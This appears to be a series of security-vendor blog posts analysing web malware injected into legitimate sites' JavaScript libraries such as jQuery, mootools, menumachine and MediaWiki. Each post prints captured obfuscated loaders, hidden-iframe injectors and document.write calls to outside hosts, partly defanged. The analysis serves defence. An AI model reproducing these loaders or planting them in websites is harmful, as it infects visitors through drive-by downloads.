Web based malware is quite interesting in the way it changes. This emerging threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors . Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article, we will discuss the evolution of a particular piece of web-malware which is being used by hackers to avoid detection worldwide.

Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

Malware Evolution
We observe many new strains of web-malware everyday. One interesting strain, which has been recurring over the past year or so is presented in this article. We will show you how this strain of malware has “evolved.” The reason for this evolution is so that the malware can avoid detection by scanning systems.

The technology we use at Stopthehacker.com (STH) does not work like traditional Anti-Virus software, however. We can each version of malware, even though it may look and act a little differently from earlier versions. Scanning technology at STH uses Machine Learning and Artificial Intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

Let’s look at each version of the web-malware below.

Version 1:
Also found on jsunpack.

<skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>

Version 2:
Found on rexbd.net.

<span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;

Version 3:
Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

<style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>   <skript>var WnmaQ={YYSXc:function(){l='';var  v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42,  57);this.mS="mS";var s=false;this.zN=false;var u="";var o =  g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r =  r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var  f=function(){};var i=document.styleSheets;zA="";var x=false;for(var  gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var  jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var  n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var  xM=function(){return 'xM'};var  q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return  'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var  nE='';var gT=new  Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var  gH=function(){};var e=false;}gG="gG";var cB=28236;var  zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return  {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var  jA=function(){};this.tH=false;var  m=w;

Analysis
Notice the difference in the variants. In the second example, the entire payload is wrapped with style information. This obfuscation is intended to fool scanners which analyze the code within the script tag. If they fail to make sense of the entire block of code as they will identify it as just another benign HTML style element. The third case is one where the payload is slightly outside the main block of malware code. In this situation the scanner must correlate the presence of the “pseudo-style” information with the actual malware code and mark the entire block as unsafe. The scanner technology at STH does exactly this.

Conclusion
Authors of web-malware are trying to hide their code. This may be the effect of increased capability in scanning technologies and a raised awareness among webmasters and web-surfers making it more difficult for malicious hackers to do their deeds. This is a good sign.

Till next time.

Report, Security iframe, malware, script, span, style

Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila – you have at your disposal a “trusted” website – lots of web surfers will drop by, and in turn get infected with the hacker’s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.

Overview

This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

An Example

Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03

In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

The “Backup” Strategy

Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

Frequency distribution of infected websites used in the transmission of malware.

Read more…

Report, Security document.write, hackers, injection, malware, script

Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k1||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k1)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

Security injection, malicious websites, script, suspicious code

We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..

Security injection, malicious websites, script, suspicious code

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and computers which load them up in browsers for the viewing them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wizened up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html.  You will find the following code listed on one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection of the Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

// MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
<pre id="cb0049f11cbf55990b47f8e86dc03a62ee0ea17d-133-highlight">
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>

Security gumblar, hack, injection, mootools, script

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed on one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using the popular, Dean-Edwards-Packer, like format. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k1){p=p.replace(new RegExp(be(c)b,g),k1)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>

Our systems flagged this as unsafe and for further validation one can look up malware-domain-list .

The exploit seems to throw a executable to the victim’s system, which in turn is a down-loader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');

Security hack, injection, script